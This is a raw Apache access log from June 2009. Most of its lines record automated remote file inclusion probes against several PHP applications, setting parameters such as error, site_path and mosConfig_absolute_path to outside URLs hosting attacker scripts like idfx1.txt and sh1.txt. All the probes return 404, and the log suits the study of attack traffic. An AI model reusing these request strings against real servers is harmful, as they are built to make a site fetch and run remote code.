212.203.95.235 - - [06/Jun/2009:03:10:48 -0400] "GET /logs/access_log.Q109052400//index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.59.12.99 - - [06/Jun/2009:03:10:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.8.112 - - [06/Jun/2009:03:11:04 -0400] "GET /logs/error_log.Q109013100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.147.30.80 - - [06/Jun/2009:03:11:38 -0400] "GET /logs///vwar/backup/errors.php?error=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:03:11:38 -0400] "GET ///vwar/backup/errors.php?error=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:03:11:38 -0400] "GET /logs/access_log.Q109051000%20%20///vwar/backup/errors.php?error=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:03:11:46 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:03:11:48 -0400] "GET /logs/access_log.Q109052300%20%20/index.php?pagina=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:03:12:26 -0400] "GET ///vwar/backup/errors.php?error=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:03:12:26 -0400] "GET /logs/access_log.Q109051000%20%20///vwar/backup/errors.php?error=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:03:12:27 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:03:12:29 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:03:13:15 -0400] "GET /logs/access_log.Q109052200//admin.lib.inc.php?site_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
121.165.73.157 - - [06/Jun/2009:03:13:15 -0400] "GET //admin.lib.inc.php?site_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
121.165.73.157 - - [06/Jun/2009:03:13:15 -0400] "GET /logs//admin.lib.inc.php?site_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
121.165.73.157 - - [06/Jun/2009:03:13:33 -0400] "GET /logs/access_log.Q109051700//admin.lib.inc.php?site_path=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
217.147.30.80 - - [06/Jun/2009:03:14:51 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:03:14:51 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:03:14:52 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:03:15:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.85.249.226 - - [06/Jun/2009:03:18:19 -0400] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
70.85.249.226 - - [06/Jun/2009:03:18:19 -0400] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.107.224.138 - - [06/Jun/2009:03:19:08 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.107.224.138 - - [06/Jun/2009:03:19:08 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:03:20:09 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.petitbijouonline.com/debug/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
